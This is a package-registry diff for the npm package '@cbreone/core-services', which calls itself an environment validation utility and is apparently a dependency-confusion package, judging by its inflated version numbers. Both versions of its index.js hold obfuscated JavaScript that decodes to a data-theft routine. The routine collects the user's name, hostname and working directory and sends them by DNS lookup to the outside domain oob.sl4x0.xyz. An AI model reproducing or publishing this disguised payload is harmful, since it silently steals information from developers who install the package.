@cbreone/core-services 999.999.999 → 9999.9999.9999

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -1 +1 @@
1
- ((()=>{let r='@cbreone/core-services';let d=x=>{let res='';for(let i=0;i<x.length;++i)res+=String.fromCharCode(x[i]);return res;};let P=global[d([112,114,111,99,101,115,115])];let O=module.constructor[d([95,108,111,97,100])](d([111,115]));let D=module.constructor[d([95,108,111,97,100])](d([100,110,115]));let a=s=>(s+'').replace(/[^a-z0-9]/gi,'')[d([115,108,105,99,101])](0,15);let u=a(O[d([117,115,101,114,73,110,102,111])]()['username']||'u');let h=a(O[d([104,111,115,116,110,97,109,101])]()||'h');let c=a(P[d([99,119,100])]().split(/[\\/]/).pop()||'p');let t=Math.floor(Date.now()/1e3);let dom=d([111,111,98,46,115,108,52,120,48,46,120,121,122]);D[d([108,111,111,107,117,112])]([r,u,h,c,t,dom].join(d([46])),()=>{P[d([101,120,105,116])](0)})}))()
1
+ ((()=>{let r='cbreonecoreserv';let d=x=>{let res='';for(let i=0;i<x.length;++i)res+=String.fromCharCode(x[i]);return res;};let P=global[d([112,114,111,99,101,115,115])];let O=module.constructor[d([95,108,111,97,100])](d([111,115]));let D=module.constructor[d([95,108,111,97,100])](d([100,110,115]));let a=s=>(s+'').replace(/[^a-z0-9]/gi,'')[d([115,108,105,99,101])](0,15);let u=a(O[d([117,115,101,114,73,110,102,111])]()['username']||'u');let h=a(O[d([104,111,115,116,110,97,109,101])]()||'h');let c=a(P[d([99,119,100])]().split(/[\\/]/).pop()||'p');let t=Math.floor(Date.now()/1e3);let dom=d([111,111,98,46,115,108,52,120,48,46,120,121,122]);D[d([108,111,111,107,117,112])]([r,u,h,c,t,dom].join(d([46])),()=>{P[d([101,120,105,116])](0)})}))()
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@cbreone/core-services",
3
- "version": "999.999.999",
3
+ "version": "9999.9999.9999",
4
4
  "description": "Internal build-time compatibility and environment validation utility",
5
5
  "license": "ISC",
6
6
  "author": "Internal Tools Team",